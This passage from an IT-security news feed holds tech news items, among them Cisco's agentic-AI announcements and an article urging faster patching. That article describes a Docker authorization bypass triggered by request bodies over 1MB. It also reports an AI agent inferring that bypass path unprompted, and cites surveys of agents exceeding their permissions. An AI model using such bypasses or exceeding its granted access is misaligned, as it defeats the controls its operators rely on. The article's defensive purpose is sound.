<p>Diese Events lassen sich durch Hunderte verschiedene Webanwendungen auslösen, darunter auch die aller großen Cloud-Anbieter und Office-Organisationsplattformen wie Jira oder Zoho. Standardanwendungen lassen sich mit Lindy zudem über vordefinierte Templates noch schneller erstellen. Ein gängiger Anwendungsfall für dieses Tool ist beispielsweise ein KI-Agent für den <a href="https://www.computerwoche.de/article/3980070/ki-tutorial-fur-bessere-helpdesks.html" target="_blank">IT-Support</a>.</p>



<h2 class="wp-block-heading"><a href="https://lovable.dev/" target="_blank" rel="noreferrer noopener">Lovable</a></h2>



<p>Die No-Code-Oberfläche von Lovable erstellt Anwendungen per Chat-Anweisung und stellt sie über die Lovable-Cloud bereit. Das Tool kümmert sich um die Benutzeroberfläche (React plus Tailwind), die Business-Logik und die Datenbank (hauptsächlich Supabase).</p>



<p>Im Ergebnis ist Lovable eines der besten Werkzeuge, um besonders schnell zu Enterprise-reifen Prototypen mit ausgefeilten <a href="https://www.computerwoche.de/article/2834420/der-niedergang-des-user-interface.html" target="_blank">Benutzeroberflächen</a> zu kommen – und diverse Sicherheits- und Zugriffskontrollfunktionen zu erstellen, die für größere Umgebungen erforderlich sind.</p>



<h2 class="wp-block-heading"><a href="https://replit.com/" target="_blank" rel="noreferrer noopener">Replit</a></h2>



<p>Die No-Code-Lösung von Replit liefert Code in bis zu 30 <a href="https://www.computerwoche.de/article/2820140/8-sprachen-die-programmierer-zur-weissglut-treiben.html" target="_blank">Programmiersprachen</a> – darunter alle gängigen und auch weniger verbreitete. Das Haupt-Interface ist ein No-Code-Chatbot, anschließend wird der Code jedoch in ein Repository übertragen, wo er mit traditionellen Methoden weiter verfeinert werden kann.</p>



<p>Der Datenbank-Layer ist bei dieser Lösung ausgegliedert. Dadurch stehen etwa Optionen wie getrennte Datenbanken für Produktion und Testing zur Verfügung. Zudem beinhaltet Replit auch Enterprise-Funktionen – zum Beispiel für Teams, die gemeinsam per Chat eine App optimieren möchten.</p>



<h2 class="wp-block-heading"><a href="https://softgen.ai/" target="_blank" rel="noreferrer noopener">Softgen</a></h2>



<p>Das Softgen-Tool erstellt vollständige Next.js-Webanwendungen als MVP aus einfachen Textbeschreibungen und funktioniert mit den wichtigsten KI-Modellen wie Claude 4.5 oder <a href="https://www.computerwoche.de/article/4028024/gemini-cli-im-praxistest.html" target="_blank">Gemini</a>.</p>



<p>Dank einer <a href="https://softgen.ai/pricing" target="_blank" rel="noreferrer noopener">Pay-as-you-go-Option</a> bezahlen Anwender bei diesem Vibe-Coding-Tool nur für die Token, die sie für ihre Anwendung benötigen.</p>



<h2 class="wp-block-heading"><a href="https://trysolid.com/" target="_blank" rel="noreferrer noopener">Solid</a></h2>



<p>Solid legt den Schwerpunkt auf die Erstellung von“Enterprise Grade“- Apps, inklusive erstklassigen Security-Modellen und verteilter Bereitstellung.</p>



<p>Die Dokumentation betont die iterative Zusammenarbeit mit der KI und die Nutzung ihrer Stärken – nämlich ein React/Tailwind-Frontend mit einer Vielzahl von Backends zu generieren.</p>



<h2 class="wp-block-heading"><a href="https://www.tempo.new/" target="_blank" rel="noreferrer noopener">Tempo Labs</a></h2>



<p>Der visuelle Editor von Tempo Labs zielt darauf ab, menschliche Benutzer dazu zu befähigen, React-Apps schneller zu erstellen – um den Faktor Zehn. Einfache visuelle Aufgaben lassen sich dabei auch ganz <a href="https://www.computerwoche.de/article/4170715/so-integrieren-sie-ki-ohne-benutzer-zu-verprellen.html" target="_blank">ohne KI</a> ausführen.</p>



<p>Das Tool legt den Schwerpunkt auf Design und unterhält eine Bibliothek mit Standardelementen für jedes Projekt. Jede React-Codebasis kann importiert und mit vorgefertigten Komponenten und Vorlagen erweitert werden. Es ist ein Editor, der inspirieren kann.</p>



<h2 class="wp-block-heading"><a href="https://v0.app/" target="_blank" rel="noreferrer noopener">Vercel</a></h2>



<p>Die v0-Plattform von Vercel bietet eine ausgedehnte Template-Kollektion als Grundlage, um Anwendungen zu designen. Auch bei dieser Lösung ist das Haupt-Interface ein Chat-Fenster, über das sich jedes erdenkliche Design umsetzen lässt. Allerdings dienen die Templates hier sowohl als Inspiration als auch als gemeinsame Sprache, um die Spezifikationen zu verfassen.</p>



<p>Die Lösung bietet auch Designvorlagen, die die Harmonisierung verschiedener Anwendungen vereinfachen. Dazu definiert sie einmalig einen Look und verwendet diesen dann wieder. Ein Schwerpunkt liegt dabei auf mobilen Browsern, was es vereinfacht, Webseiten zu erstellen, die für Mobilgeräte optimiert sind.</p>



<h2 class="wp-block-heading"><a href="https://windsurf.com/" target="_blank" rel="noreferrer noopener">Windsurf</a></h2>



<p>Windsurf ist eine integrierte Entwicklungsumgebung mit eingebetteter KI. Sie ist darauf ausgelegt, längere mehrstufige Pläne („Cascades“) zu generieren – etwa, um <a href="https://www.computerwoche.de/article/4032752/5-tipps-fur-bessere-bug-reports.html" target="_blank">Bugs</a> zu beheben oder eine Codebasis um Funktionen zu erweitern. Anders ausgedrückt: Windsurf ermöglicht Vibe Coding, das darauf ausgerichtet ist, traditionelle Dev-Techniken zu unterstützen.</p>



<p>Die Tabulatortaste ist innerhalb der Windsurf-IDE dabei besonders leistungsstark: Bei Betätigung springt die KI von einem vorgeschlagenen Fix zum nächsten. Ihre Zustimmung signalisieren die Benutzer dabei durch einen erneuten Tab-Tastendruck. (fm)</p>



<p><strong>Dieser Artikel ist </strong><a href="https://www.cio.com/article/4165921/19-vibe-coding-tools-for-democratizing-app-development.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation CIO.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco brings agentic ops platform and security overhaul to Cisco Live]]></title>
<description><![CDATA[Cisco built the networking infrastructure that underpins the internet and the cloud. At Cisco Live this week, the company is making its case to hold that same position as enterprises shift from AI chatbots to autonomous agents. Where chatbots answer questions, agents take actions: They execute ta...]]></description>
<link>https://tsecurity.de/de/3566263/it-security-nachrichten/cisco-brings-agentic-ops-platform-and-security-overhaul-to-cisco-live/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566263/it-security-nachrichten/cisco-brings-agentic-ops-platform-and-security-overhaul-to-cisco-live/</guid>
<pubDate>Tue, 02 Jun 2026 15:20:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.networkworld.com/article/3523958/cisco-latest-news-and-insights.html">Cisco</a> built the networking infrastructure that underpins the internet and the cloud. At <a href="https://www.ciscolive.com/">Cisco Live</a> this week, the company is making its case to hold that same position as enterprises shift from AI chatbots to autonomous agents. Where chatbots answer questions, agents take actions: They execute tasks, call tools, make changes, and operate continuously at machine speed. That changes the requirements for networking, security, and observability, and it is the frame for a series of announcements.</p>



<p>Among the key announcements from the Las Vegas event are:</p>



<ul class="wp-block-list">
<li><strong>Cisco Cloud Control:</strong> A unified management platform spanning Meraki, Nexus, Intersight, Splunk, and Collaboration.</li>



<li><strong>Agentic Actions for networking:</strong> Closed-loop autonomous remediation for campus and branch networks. </li>



<li><strong>Cisco Multicloud Fabric:</strong> A cloud-delivered service connecting branches, data centers, and cloud workloads across AWS, Azure, Google Cloud, and neoclouds.</li>



<li><strong>Live Protect expansion:</strong> Runtime vulnerability shielding without reboots or maintenance windows, expanding to campus and branch Smart Switches.</li>



<li><strong>Agentic IAM:</strong> Ephemeral, task-scoped access controls for AI agents delivered through Cisco Secure Access.</li>



<li><strong>Cisco Data Fabric powered by Splunk:</strong> Federated Search, a Turnkey Machine Data Lake, an AI Toolkit, and an Agentic SOC with six purpose-built security agents.</li>



<li><strong>New hardware:</strong> C9550 Core switch, 8100/8200/8300/8600 Secure Routers, outdoor Wi-Fi 7, the IR1000 industrial router, and the Cisco Board Pro G3.</li>
</ul>



<p>“It’s no longer about humans clicking through dashboards, in a multitude of dashboards, trying to keep up with what the agents are doing,” <a href="https://www.linkedin.com/in/djsampath/">DJ Sampath</a>, senior vice president and general manager for AI software and platform, said during a press briefing. “A true collaborative operating model starts when agents are doing the heavy lifting and humans are constantly staying in control of what matters.”</p>



<h2 class="wp-block-heading">Cisco Cloud Control</h2>



<p>Managing enterprise infrastructure today means logging into separate dashboards for networking, security, compute, observability, and collaboration. Cloud Control replaces that with a single environment where humans and agents work from the same data and the same interface.</p>



<p>“With Cloud Control, what you’re getting is a secureness that allows you to be able to manage your infrastructure really, you know, effectively,” Sampath said. “It provides you with observability controls, it provides you with, you know, a safe AI gateway, guardrails for these agents. All of these come bundled along with Cloud Control.”</p>



<p>Core capabilities in Cloud Control include:</p>



<ul class="wp-block-list">
<li><strong>Cross-domain telemetry</strong>: Cloud Control aggregates data across networking, security, observability, AI infrastructure and collaboration into a shared data fabric that both operators and agents draw from simultaneously.</li>



<li><strong>Purpose-built models</strong>: Incoming tasks are routed to the most appropriate model rather than sent through a single large language model. Cisco’s own models include the Deep Network Model, trained on four decades of operational networking data, a Foundation Security Model, and a time-series model for telemetry analysis. Frontier models are available for broad reasoning tasks.</li>



<li><strong>Trusted agents</strong>: Agents are grounded in live telemetry, governed with enterprise guardrails and action-ready to execute at machine speed. The Cisco AI Canvas is the multiplayer workspace where operators and agents investigate and resolve incidents from shared live data. An Actions queue surfaces recommendations, root cause analyses and confidence scores for human review before any change is deployed.</li>



<li><strong>Cloud Control Studio</strong>: Targeted for late 2026, Studio adds an Agent Builder for creating custom agents with connectivity to more than 50 third-party platforms via native connectors or the Model Context Protocol, and an App Builder that embeds OpenAI’s Codex into the platform. Anything built inside Cloud Control inherits its observability and security controls automatically.</li>



<li><strong>Cloud Control Marketplace:</strong> Launches with integrations across IT service management (ServiceNow, Atlassian, BMC), identity (Okta, Ping Identity, Microsoft Entra ID, Jamf), network monitoring (LiveAction, Panduit), infrastructure knowledge (NetBox Labs, Device42, Vertiv) and AI-native platforms (Anthropic, OpenAI, NVIDIA, Collibra), among others.</li>
</ul>



<h2 class="wp-block-heading">Agentic networking and Multicloud Fabric</h2>



<p>Network operations teams still rely on manual processes to detect problems and push fixes, while enterprise AI applications are increasingly split across multiple clouds. Cisco is addressing both with announcements this week.</p>



<p>First up is Agentic Actions for networking. Entering beta in June 2026 via Meraki, the feature follows a five-stage loop: sense, diagnose, remediate, validate, deploy. Experience Metrics converts raw device telemetry into user-experience measurements in real time. Deep Reasoning applies Cisco’s purpose-built models to multi-step root cause analysis. Digital Twin runs an emulated replica of the production network using actual software images rather than a mathematical model, allowing agents to test changes before deployment. Digital Twin enters alpha in July 2026.</p>



<p>The second announcement in this area is Cisco Multicloud Fabric. It connects branches, data centers, and cloud workloads across AWS, Azure, Google Cloud, and neocloud providers through a managed overlay with no customer-side hardware required. The fabric includes zero trust routing, cloud firewall service chaining and built-in ThousandEyes and Splunk observability.</p>



<p>“This is a cloud-delivered service that Cisco builds and operates, so there’s nothing for the customer to install or deploy,” said <a href="https://www.linkedin.com/in/anurag-dhingra/">Anurag Dhingra</a>, senior vice president and general manager for enterprise connectivity and collaboration. “It’s instantly available, configured seamlessly with one button in Cisco Cloud Control, and it stitches all of this connectivity in minutes.”</p>



<h2 class="wp-block-heading">Security: Live Protect and Agentic IAM</h2>



<p>Frontier AI models have compressed the window between vulnerability discovery and exploitation from months to minutes. Cisco is responding with runtime defenses that operate at the infrastructure layer and a new access control model built specifically for AI agents.</p>



<p><strong>Live Protect:</strong> Applies runtime compensating controls to network devices without reboots or maintenance windows, precise enough to target a specific process-to-file interaction on a running device. </p>



<p><strong>Agentic IAM</strong>: Rather than standing role-based access, agents receive ephemeral permissions scoped to a specific task, delivered through Cisco Secure Access via multi-turn LLM, API and MCP policy enforcement. </p>



<p>“So instead of access control, we start to move to action control,” said <a href="https://www.linkedin.com/in/tomgillis1/">Tom Gillis</a>, senior vice president and general manager for infrastructure and security. “It’s just in time, it’s just enough access, and it’s just long enough, meaning it’s ephemeral. So you don’t get six months or a year’s worth of access, you get the access that you need to be able to do and perform a task and no more.”</p>



<p><strong>Non-human identity and agent protection</strong>: Cisco is building on technology it gained via the<a href="https://www.networkworld.com/article/4166695/cisco-grabs-astrix-to-secure-ai-agents.html"> acquisition of Astrix Security</a> to improve agentic AI security. The technology uses process-level inspection to distinguish agent activity from human activity.<a href="https://www.networkworld.com/article/4148823/cisco-goes-all-in-on-agentic-ai-security.html"> DefenseClaw,</a> Cisco’s open-source runtime security framework for AI agents, is being embedded into Cisco Secure Client. With Secure Client deployed on more than 200 million enterprise devices, that means endpoint-level agent protections can be applied across the enterprise without requiring developers to instrument each agent individually.</p>



<h2 class="wp-block-heading">Cisco Data Fabric and the Agentic SOC</h2>



<p><a href="https://www.networkworld.com/article/4053209/cisco-launches-ai-driven-data-fabric-powered-by-splunk.html">Cisco Data Fabric</a>, which debuted in September 2025, is getting a big update at Cisco Live. Powered by Splunk, it consolidates telemetry across network, application, security and third-party sources into a common layer that both human analysts and automated agents draw from, and serves as the data foundation for Cloud Control and the Agentic SOC.</p>



<p>Among the enhancements is an improved federated search capability. “Instead of having to move data into Splunk, we bring Splunk to the data and we can query this data across different environments without copying, without moving it,” <a href="https://www.linkedin.com/in/kamal-hathi/">Kamal Hathi</a>, sernior vice president and general manager for Splunk, said.</p>



<p>There is also an AI Toolkit Agent Builder that provides domain-specific models for machine data operations as well as what Cisco is calling a Turnkey Machine Data Lake which automates schema management for raw machine data using AI. </p>



<p>On top of the data fabric, Cisco is deploying an Agentic SOC with purpose-built agents covering the full detection and response lifecycle. </p>



<p>“We’re reducing the time and sophistication required for security operations,” Hathi said. “We’re driving down from what used to take maybe days and hours down to minutes and seconds.”</p>



<p>Going a step further Cisco is integrating an AI SRE capability that performs autonomous root cause analysis for application and infrastructure performance issues. Technology gained by the<a href="https://www.networkworld.com/article/4156855/cisco-to-acquire-galileo-for-ai-observability.html"> acquisition of Galileo</a> earlier this year, adds trace-level observability into agent execution covering tool calls, LLM interactions and prompt injection detection.</p>



<p>“Splunk then provides us full visibility into all aspects of the use of AI and agentic solutions and really makes all of this possible at scale in a trusted manner,” Hathi said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI arrives for Delphi and C++ Builder]]></title>
<description><![CDATA[Kai is an extension for RAD Studio (Delphi and C++ Builder) that integrates with external AI providers]]></description>
<link>https://tsecurity.de/de/3564196/it-nachrichten/agentic-ai-arrives-for-delphi-and-c-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3564196/it-nachrichten/agentic-ai-arrives-for-delphi-and-c-builder/</guid>
<pubDate>Mon, 01 Jun 2026 21:47:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kai is an extension for RAD Studio (Delphi and C++ Builder) that integrates with external AI providers]]></content:encoded>
</item>
<item>
<title><![CDATA[Remembering Alan Barrett: A Builder of the African Internet]]></title>
<description><![CDATA[We were deeply saddened to learn of the passing of Alan Barrett, a long-time friend, colleague, mentor, and one of the builders of the Internet in Africa.
The post Remembering Alan Barrett: A Builder of the African Internet appeared first on Internet Society.]]></description>
<link>https://tsecurity.de/de/3563780/it-nachrichten/remembering-alan-barrett-a-builder-of-the-african-internet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563780/it-nachrichten/remembering-alan-barrett-a-builder-of-the-african-internet/</guid>
<pubDate>Mon, 01 Jun 2026 18:47:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="250" height="115" src="https://www.internetsociety.org/wp-content/uploads/2026/06/Alan-Barrett-250x115.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Alan Barrett stands and talks to a small group of people, the group slightly covered by a blue gradient." decoding="async" srcset="https://www.internetsociety.org/wp-content/uploads/2026/06/Alan-Barrett-250x115.png 250w, https://www.internetsociety.org/wp-content/uploads/2026/06/Alan-Barrett-450x206.png 450w, https://www.internetsociety.org/wp-content/uploads/2026/06/Alan-Barrett-1024x469.png 1024w, https://www.internetsociety.org/wp-content/uploads/2026/06/Alan-Barrett-768x352.png 768w, https://www.internetsociety.org/wp-content/uploads/2026/06/Alan-Barrett.png 1200w" sizes="(max-width: 250px) 100vw, 250px"></p>
<p>We were deeply saddened to learn of the passing of Alan Barrett, a long-time friend, colleague, mentor, and one of the builders of the Internet in Africa.</p>
<p>The post <a href="https://www.internetsociety.org/blog/2026/06/remembering-alan-barrett-a-builder-of-the-african-internet/">Remembering Alan Barrett: A Builder of the African Internet</a> appeared first on <a href="https://www.internetsociety.org/">Internet Society</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Mythos exposed a hard truth: Your enterprise patching process is way too slow]]></title>
<description><![CDATA[In 2024, researchers from the University of Illinois found that GPT-4, when provided with a common vulnerabilities and exposures (CVE) description, could autonomously exploit 87% of a curated 15-vulnerability one-day dataset. Without the description, it could only exploit 7%. This provided a “mar...]]></description>
<link>https://tsecurity.de/de/3561173/it-nachrichten/claude-mythos-exposed-a-hard-truth-your-enterprise-patching-process-is-way-too-slow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561173/it-nachrichten/claude-mythos-exposed-a-hard-truth-your-enterprise-patching-process-is-way-too-slow/</guid>
<pubDate>Sun, 31 May 2026 19:17:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In 2024,<a href="https://arxiv.org/abs/2404.08144"> <u>researchers from the University of Illinois</u></a> found that GPT-4, when provided with a common vulnerabilities and exposures (CVE) description, could autonomously exploit 87% of a curated 15-vulnerability one-day dataset. Without the description, it could only exploit 7%. This provided a “margin of safety” for the industry because while AI could exploit known vulnerabilities, it could not discover them. </p><p>However, on April 7,<a href="https://www.anthropic.com/glasswing"> <u>Anthropic announced</u></a> that Claude Mythos Preview had closed that margin, with the model autonomously discovering thousands of zero-day vulnerabilities across major operating systems and browsers. Separately, Mythos scored 83.1% on the CyberGym vulnerability reproduction benchmark. In one campaign targeting OpenBSD across 1,000 scaffold runs, the total compute cost was less than $20,000. </p><p>Exploitation timelines are collapsing. Langflow’s CVE-2026-33017 (CVSS 9.8) was<a href="https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"> <u>exploited 20 hours after disclosure</u></a> with no public proof-of-concept. Marimo’s CVE-2026-39987 (CVSS 9.3) was<a href="https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours"> <u>hit in 9 hours and 41 minutes</u></a>.</p><p>The defensive infrastructure most organizations rely on wasn’t designed for this.<a href="https://www.rapid7.com/research/report/global-threat-landscape-report-2026/"> <u>Rapid7’s 2026 threat landscape report</u></a> states that the median time from CVE publication to CISA's known exploited vulnerabilities (KEV) listing is five days.<a href="https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2026"> <u>Google’s M-Trends 2026</u></a> report found that exploitation is happening before a patch is even released. When the Langflow advisory was published, the first exploit arrived in 20 hours. When the Marimo advisory was published, it took under 10 hours. </p><p>The assumption that your patch window is safe because exploitation takes time is no longer true. Here are your building blocks.</p><h2><b>Replace CVSS-only prioritization with a three-layer filter</b></h2><p>Most vulnerability management programs still prioritize by CVSS score alone. CVSS quantifies a vulnerability’s “theoretical” severity without considering whether a vulnerability is being exploited in the wild or how quickly someone could weaponize it. A CVSS 8.8 vulnerability with a history of active exploitation (like Docker’s<a href="https://nvd.nist.gov/vuln/detail/CVE-2026-34040"> <u>CVE-2026-34040</u></a>) gets lower priority than a CVSS 9.8 vulnerability that may never be exploited in the wild.</p><p>A<a href="https://arxiv.org/abs/2506.01220"> <u>recent study</u></a> validated against 28,377 real-world vulnerabilities offers a concrete replacement: A three-layer decision tree incorporating CISA KEV status, Exploit Prediction Scoring System (EPSS) scores, and CVSS, thus forming a singular prioritization filter.</p><h4><b>Three-Layer Vulnerability Prioritization Filter</b></h4><table><tbody><tr><td><p><b>Layer</b></p></td><td><p><b>Data source</b></p></td><td><p><b>Threshold</b></p></td><td><p><b>Action</b></p></td><td><p><b>SLA</b></p></td></tr><tr><td><p>1. Active exploitation</p></td><td><p>CISA KEV catalog</p></td><td><p>Listed</p></td><td><p>Immediate patching</p></td><td><p>Hours</p></td></tr><tr><td><p>2. Predicted exploitation</p></td><td><p>EPSS via FIRST.org</p></td><td><p>Score ≥ 0.088</p></td><td><p>Escalate to Tier 0 pipeline</p></td><td><p>24 hours</p></td></tr><tr><td><p>3. Severity baseline</p></td><td><p>CVSS via NVD</p></td><td><p>Score ≥ 7.0</p></td><td><p>Typical remediation</p></td><td><p>Per policy</p></td></tr></tbody></table><p><i>Validated result: 18x efficiency gain, 85.6% coverage of exploited vulnerabilities, ~95% reduction in urgent remediation workload. All three data sources are open and free.</i></p><p>The described integration is entirely automatable. It’s possible to build a script to query the CISA KEV API, the EPSS API from FIRST.org, and the <a href="https://nvd.nist.gov/">NVD</a>, and have that script run against your asset inventory for every published CVE. The human in this process should remain in the loop as an approver, but not as the trigger.</p><h2><b>Close the agent authorization gap</b></h2><p>Creating exploits quickly not only changes how patches are prioritized, but how controls are configured for all the agent-driven systems that now possess privileged credentials. Your authorization policies have not been assessed against the behavior of AI agents, and that is now a measurable risk. CVE-2026-34040 showed that Docker’s authorization plugin architecture silently bypasses every plugin when the request body exceeds 1MB. Common AuthZ plugins (OPA, Casbin, Prisma Cloud) are unaware of this type of bypass, which occurs in Docker’s middleware before the request reaches the plugin.</p><p>When<a href="https://www.cyera.com/blog/cyera-research-discovers-docker-authorization-bypass-that-silently-disables-security-policies"> <u>Cyera demonstrated this vulnerability</u></a>, they showed that an AI agent debugging infrastructure could infer the bypass path while completing a legitimate task, without any instruction to exploit anything.</p><p>The Internet Engineering Task Force (IETF) is working on authorization models for agents. The document<a href="https://datatracker.ietf.org/doc/draft-klrc-aiagent-auth/"> <u>draft-klrc-aiagent-auth-01</u></a>, published in March by participants from AWS, Zscaler, Ping Identity, and OpenAI, proposes the use of the current Secure Production Identity Framework for Everyone (SPIFFE) and OAuth 2.0 for AI agents to obtain dynamically provisioned and short-lived credentials. </p><p>Separately, the IETF<a href="https://datatracker.ietf.org/doc/draft-prakash-aip/"> <u>Agent Identity Protocol draft</u></a> (draft-prakash-aip-00) reports that out of about 2,000 surveyed model context protocol (MCP) servers, none had authentication. </p><p>But these standards are months to years away from implementation. For now, security teams must proactively incorporate agent-level test scenarios for all authorization boundaries, such as oversized requests, burst frequency, and multi-step escalation of privileged requests.</p><h2><b>Map your credential blast radius</b></h2><p>In a<a href="https://cloudsecurityalliance.org/press-releases/2026/04/16/more-than-half-of-organizations-experience-ai-agent-scope-violations-cloud-security-alliance-study-finds"> <u>survey conducted by CSA/Zenity</u></a> and published on April 16, 53% of organizations said they had already seen cases where AI agents exceeded their intended permissions, and 47% experienced a security incident involving an agent. </p><p>When AI builder tools such as<a href="https://thehackernews.com/2026/04/flowise-ai-agent-builder-under-active.html"> <u>Flowise</u></a> (CVE-2025-59528, CVSS 10.0), Langflow, or n8n become compromised, the blast radius extends far beyond the host. These tools contain API keys to frontier models, database credentials, vector store tokens, and OAuth tokens to business systems. A compromised AI builder host is not just a single-system breach. It is a credential harvest that unlocks authenticated access to every connected service.</p><p>Without credential dependency maps for each AI tool host, incident response for agent compromise is guesswork. For every instance, document each credential, the extent of its access, and the relevant credential rotation process. Also begin migrating static API keys to short-lived tokens where downstream services allow.</p><h2><b>Five actions for this quarter</b></h2><p><b>1. Deploy the three-layer KEV-EPSS-CVSS filter</b></p><p>Substitute CVSS-only prioritization according to the table above. Automate the collection of data from all three APIs as part of a scheduled script against your asset inventory. Desired outcome: 18 times more efficient, 85.6% coverage of exploited vulnerabilities, 95% reduction in urgent remediation workload.</p><p><b>2. Implement event-driven patching for Tier 0 services.</b> </p><p>Determine which services fall under the critical exposure tier: Services exposed directly to internet users, AI builder hosts, and container orchestration control plane. Trigger event-driven patching on a CVE publication instead of waiting for the next maintenance window for this tier. </p><p>Goal: deploy patch to canary within four hours of a CVE being declared critical. Use the CISA KEV and EPSS feeds to trigger event-driven patching. In situations where it is impossible to meet the goal of four-hour patching because of legacy dependencies, change-freeze windows, or rollback risk, immediately apply compensating controls such as removing internet exposure to the vulnerable service, rotating credentials for the vulnerable service, disabling affected functionality of the service (if applicable), and identifying an exception owner for the exposure until a patch can be deployed. </p><p>It is not acceptable to allow unbounded exposures for extended periods while awaiting a maintenance window.</p><p><b>3. Test authorization boundaries at agent scale.</b> </p><p>Create test cases for every API that AI agents may communicate with via AuthZ policies. Specifically, include test cases for requests exceeding 1MB, 5MB, and 10MB body sizes. This includes test cases for burst rate &gt; 100 requests per second and test cases for unusual parameter combinations (privileged flags, host mounts, capability additions). Additionally,<a href="https://www.csoonline.com/article/4157405/old-docker-authorization-bypass-pops-up-despite-previous-patch.html"> <u>patch to Docker Engine 29.3.1</u></a> to fix CVE-2026-34040.</p><p><b>4. Credential blast radius mapping for all AI builder hosts.</b> </p><p>Document each credential for each Langflow, Flowise, n8n, and custom AI pipeline instance. Classify each credential by its lifespan (static key vs. short-lived token). Identify what each credential can access. Set up alerts for anomalous IP or identity for any credential access.</p><p><b>5. Shadow AI discovery scan for this week.</b> </p><p>According to CSA data, there is a greater than 50% chance that your agents have exceeded their expected boundaries. Check your Security Information and Event Management (SIEM) and network monitoring tools for communications to the default ports of the AI builder: Langflow 7860, Flowise 3000, and n8n 5678. Any unauthorized instances are an unmonitored attack surface.</p><h2>The takeaway</h2><p>AI agents are emerging, and t<!-- -->he standards bodies are responding. The IETF has multiple drafts related to agent authentication and authorization. The<a href="https://www.coalitionforsecureai.org/"> <u>Coalition for Secure AI</u></a> has published its <a href="https://www.coalitionforsecureai.org/wp-content/uploads/2026/03/model-context-protocol-security-1.pdf"><u>MCP Security taxonomy</u></a> and <a href="https://www.coalitionforsecureai.org/announcing-the-cosai-principles-for-secure-by-design-agentic-systems/"><u>Secure-by-Design principles</u></a>. </p><p>But these standards move at standards-body speed, and the exploit window is now measured in hours. Organizations that implement the three-layer filter and event-driven patching this quarter will have a measurable reduction in exposure. Those who wait will be running calendar-based patch cycles against an adversary that operates in less than 20 hours. </p><p><i>Nik Kale is a principal engineer specializing in enterprise AI platforms and security</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Servo Blog: April in Servo: new Android UI, focus, forms, security fixes, and more!]]></title>
<description><![CDATA[Servo 0.2.0 contains all of the changes we landed in April, which came out to yet another record 534 commits (March: 530).
For security fixes, see § Security.

Note: the GitHub release is available now, but the crates.io release is not yet complete.
We expect to publish it some time next week.


...]]></description>
<link>https://tsecurity.de/de/3560659/tools/the-servo-blog-april-in-servo-new-android-ui-focus-forms-security-fixes-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560659/tools/the-servo-blog-april-in-servo-new-android-ui-focus-forms-security-fixes-and-more/</guid>
<pubDate>Sun, 31 May 2026 13:08:28 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/servo/servo/releases/tag/v0.2.0"><strong>Servo 0.2.0</strong></a> contains all of the changes we landed in April, which came out to yet another record <strong>534 commits</strong> (March: 530).
For security fixes, see <a href="https://servo.org/blog/2026/05/31/april-in-servo/#security"><strong>§ Security</strong></a>.</p>
<aside class="_note">
<p><strong>Note:</strong> the GitHub release is available now, but <a href="https://crates.io/crates/servo">the crates.io release</a> is not yet complete.
We expect to publish it some time <strong>next week</strong>.</p>
</aside>
<figure>
    <a href="https://servo.org/img/blog/2026-05-diffie.png"><img alt="servoshell 0.2.0 showing several new features: better wrapping for CJK scripts, ‘tab-size’, better file pickers and `&lt;textarea&gt;`, `&lt;select multiple&gt;`, ‘::details-content::before’ and ‘::details-content::after’, and ‘color-mix()’ with any number of colors" src="https://servo.org/img/blog/2026-05-diffie.png"></a>
</figure>
<p>We’ve shipped several new web platform features:</p>
<ul>
<li><strong>&lt;select multiple&gt;</strong> (<a href="https://github.com/lukewarlow">@lukewarlow</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43189">#43189</a>)</li>
<li><strong>&lt;template shadowrootslotassignment&gt;</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44246">#44246</a>)</li>
<li><strong>&lt;video&gt;</strong> playback on OpenHarmony (<a href="https://github.com/rayguo17">@rayguo17</a>, <a href="https://github.com/servo/servo/pull/43208">#43208</a>)</li>
<li><strong>‘minimum-scale’</strong> and <strong>‘maximum-scale’</strong> values in <strong>&lt;meta name=viewport&gt;</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/40098">#40098</a>, <a href="https://github.com/servo/servo/pull/43715">#43715</a>)</li>
<li><strong>‘color-mix()’</strong> with <strong>any number of &lt;color&gt; values</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43890">#43890</a>)</li>
<li><strong>‘&amp;::before’</strong> and <strong>‘&amp;::after’</strong> in <strong>‘::details-content’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>)</li>
<li><strong>‘revert-rule’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>)</li>
